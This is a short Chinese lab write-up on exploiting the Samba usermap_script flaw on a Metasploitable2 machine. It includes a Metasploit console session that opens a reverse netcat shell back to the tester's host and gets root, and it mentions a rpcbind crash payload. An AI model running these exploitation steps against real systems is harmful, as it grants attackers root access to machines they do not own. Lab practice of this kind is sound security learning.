记一次metasploitable2内网渗透之samba服务的攻击
80端口中对应一些web靶场,在这里不记录
111端口的利用是向rpcbind服务的UDP套接字发送60字节载荷,便可填充目标内存,搞崩主机系统。在这里也不记录
Samba服务简介 Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。
SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,
它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,
客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。
通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。
该samba服务基本上存在于139和445端口
msfconsole -q msf6 > use exploit/multi/samba/ use exploit/multi/samba/nttrans use exploit/multi/samba/usermap_script msf6 > use exploit/multi/samba/usermap_script [*] No payload configured, defaulting to cmd/unix/reverse_netcat msf6 exploit(multi/samba/usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 139 yes The target port (TCP) Payload options (cmd/unix/reverse_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.137 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.43.46 rhosts => 192.168.43.46 msf6 exploit(multi/samba/usermap_script) > run [*] Started reverse TCP handler on 192.168.43.137:4444 [*] Command shell session 1 opened (192.168.43.137:4444 -> 192.168.43.46:59839) at 2020-12-07 22:10:52 +0800 whoami root
学习之旅
浙公网安备 33010602011771号